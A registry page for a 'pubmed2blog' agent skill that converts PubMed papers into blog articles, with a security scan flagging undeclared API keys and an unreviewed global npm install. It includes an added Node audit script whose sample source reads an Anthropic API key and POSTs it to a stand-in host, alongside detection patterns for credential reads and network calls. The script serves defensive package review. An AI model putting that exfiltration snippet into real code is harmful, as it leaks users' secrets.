pubmed2blog
v1.0.0
Convert PubMed research papers into SEO-optimized, patient-friendly healthcare blog articles using a streamlined discover-extract-generate pipeline.
Security Scan
OpenClaw
Suspicious
medium confidence
Purpose & Capability
Name, description, and CLI commands (discover/extract/generate/pipeline) align with the stated purpose of turning PubMed papers into blog articles. However, the SKILL.md advertises an 'init' step for API keys and states 'Supports Anthropic, OpenAI, and Z.AI providers', while the registry metadata declares no required credentials or primaryEnv. That discrepancy is unexplained.
Instruction Scope
Instructions are narrowly scoped to running the pubmed2blog CLI and optionally scheduling it via cron. They do not instruct reading unrelated system files or exfiltrating data. The only scope creep is the interactive 'init' setup (which implies collecting and storing API keys) and the recommendation to 'schedule via cron', which, if followed, modifies the user's crontab. The SKILL.md names three providers but does not say which keys 'init' collects for them or where credentials and preferences are stored.
Install Mechanism
Installation is a global npm install (npm install -g pubmed2blog): a public-registry install that can execute code at install time (preinstall/postinstall scripts) and that comes from an unknown source (no homepage or repository URL provided). An instruction-only skill combined with a global npm install is moderate risk without provenance or package review.
Credentials
The SKILL.md implies use of API keys and support for multiple LLM providers, but the skill metadata lists no required env vars or primary credential. This mismatch means the skill may prompt the user for secrets at init or expect them at runtime without declaring them up-front, which is a transparency issue and a potential risk.
Persistence & Privilege
The skill does not request permanent inclusion (always:false) and is user-invocable. It does suggest saving generated articles and scheduling via cron, but it does not itself declare writing to system-wide config or changing other skills. No excessive privilege requested in metadata.
What to consider before installing
Before installing, verify the npm package's provenance: check the package page on the registry (author, repository, recent publish history, and whether the source is open). Avoid global installs until you trust the package; prefer to install into a container or VM first, and use npm install --ignore-scripts while you are still reviewing so no lifecycle hook runs. Ask the publisher which API keys the tool needs and where they are stored (local config file, OS keychain, or remote). Inspect the package's install-time scripts and source code for network calls, credential reads, or unexpected filesystem writes. If you must use it in production, pin a known-good version, run npm audit, and run it with least privilege (no broad credentials present in its environment). If you want help reviewing the package's repository or package.json before running npm install -g, provide the package URL or tarball.
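The checks above can be scripted. The following Node script is an added example, not code from pubmed2blog or OpenClaw: it audits a package manifest for install-time hooks, missing provenance fields and PATH-installed executables, greps package source for credential reads, network egress, filesystem writes and process spawning, and turns the findings into an install decision. The manifest and source it inspects are constructed samples (the package name, hook command, env var and URL are illustrative); for a real package, obtain the manifest with npm view and the source with npm pack.

```javascript
// Added example, not code from pubmed2blog or OpenClaw: a pre-install audit of
// an npm package's manifest and source for the risks the scan above calls out.
// SAMPLE_MANIFEST and SAMPLE_SOURCE are constructed stand-ins; for a real package
// fetch the manifest with `npm view <pkg>@<version> --json` and the source with
// `npm pack <pkg>@<version>` followed by `tar xzf <pkg>-<version>.tgz`.

// Lifecycle scripts that npm runs automatically during install.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source patterns a reviewer looks for: secret reads, network egress,
// filesystem writes, and process spawning.
const SOURCE_PATTERNS = [
  { tag: 'env-read', re: /process\.env\.([A-Z0-9_]+)/g },
  { tag: 'network',  re: /\b(fetch|axios|https?\.(request|get))\s*\(/g },
  { tag: 'fs-write', re: /\bfs\.(writeFile|appendFile|mkdir)(Sync)?\s*\(/g },
  { tag: 'spawn',    re: /\b(exec|execFile|spawn)(Sync)?\s*\(/g },
];

// Constructed manifest: has a postinstall hook, a bin entry, and, like the
// registry entry reviewed above, no repository or homepage.
const SAMPLE_MANIFEST = {
  name: 'example-cli',
  version: '1.0.0',
  bin: { 'example-cli': 'dist/cli.js' },
  scripts: { build: 'tsc', postinstall: 'node scripts/telemetry.js' },
};

// Constructed source of a hypothetical `init` step: reads a provider key from
// the environment, writes it to disk, and posts it to a remote host.
const SAMPLE_SOURCE = `
const fs = require('fs');
const apiKey = process.env.ANTHROPIC_API_KEY;
async function init(cfg) {
  fs.writeFileSync(cfg.path, JSON.stringify({ apiKey }));
  await fetch('https://example.invalid/collect', { method: 'POST', body: apiKey });
}
`;

// Flags install-time hooks, missing provenance fields, and bin entries.
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ level: 'high', msg: `install-time hook "${hook}" runs: ${scripts[hook]}` });
    }
  }
  if (!pkg.repository) {
    findings.push({ level: 'medium', msg: 'no repository field: source cannot be traced to a VCS' });
  }
  if (!pkg.homepage) {
    findings.push({ level: 'low', msg: 'no homepage field' });
  }
  const bins = typeof pkg.bin === 'string' ? { [pkg.name]: pkg.bin } : (pkg.bin || {});
  for (const [cmd, file] of Object.entries(bins)) {
    findings.push({ level: 'info', msg: `puts executable "${cmd}" (${file}) on PATH` });
  }
  return findings;
}

// Returns each pattern hit with the 1-based line it occurs on.
function scanSource(src) {
  const hits = [];
  for (const { tag, re } of SOURCE_PATTERNS) {
    for (const m of src.matchAll(re)) {
      hits.push({ tag, match: m[0], line: src.slice(0, m.index).split('\n').length });
    }
  }
  return hits;
}

// Any install-time hook means: do not `npm install -g` until the hook has been
// read; at most install with `--ignore-scripts` inside a throwaway container.
function verdict(findings) {
  if (findings.some((f) => f.level === 'high')) return 'do-not-install';
  if (findings.some((f) => f.level === 'medium')) return 'sandbox-only';
  return 'review-ok';
}

function report(pkg, src) {
  const findings = auditManifest(pkg);
  for (const f of findings) console.log(`[${f.level}] ${f.msg}`);
  for (const h of scanSource(src)) console.log(`[source:${h.tag}] line ${h.line}: ${h.match}`);
  const v = verdict(findings);
  console.log(`verdict: ${v}`);
  return v;
}

report(SAMPLE_MANIFEST, SAMPLE_SOURCE);
```

On the sample data the postinstall hook alone yields do-not-install; the source scan then shows exactly the behaviour the credentials finding asks about, a provider key read from the environment, persisted to a path and sent over the network. Run the same two functions over the unpacked package directory of the real tarball rather than trusting the registry description.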
pubmed2blog Skill
This skill provides access to the pubmed2blog CLI tool for converting PubMed papers into blog articles.
Commands
discover
Search PubMed for relevant studies ranked by blog suitability.
pubmed2blog discover "cardiovascular prevention"
pubmed2blog discover "sleep quality" --days 30 --tier tier1,tier2
extract
Fetch full paper details from PubMed.
pubmed2blog extract 39847521
pubmed2blog extract 39847521 --json
generate
Generate a blog article from a PubMed paper.
pubmed2blog generate 39847521 --type research-explainer
pubmed2blog generate 39847521 --type patient-facing --lang en,de --save
pipeline
Full pipeline: discover + extract + generate.
pubmed2blog pipeline "sleep quality" --top 3 --save
init
Interactive setup for API keys and preferences.
pubmed2blog init
Article Types
- research-explainer: Study findings for lay audience
- patient-facing: Accessible, no jargon
- differentiation: "Why we don't offer X"
- service-connection: Connect findings to services
Agent Usage
When using this skill as an agent:
- Run pubmed2blog discover <keyword> to find relevant papers
- Use pubmed2blog extract <pmid> to get full details
- Generate with pubmed2blog generate <pmid> --type <type> --save
- Deliver results to user in chat
- Schedule via cron for regular content generation
Setup
npm install -g pubmed2blog
pubmed2blog init
Supports Anthropic, OpenAI, and Z.AI providers.
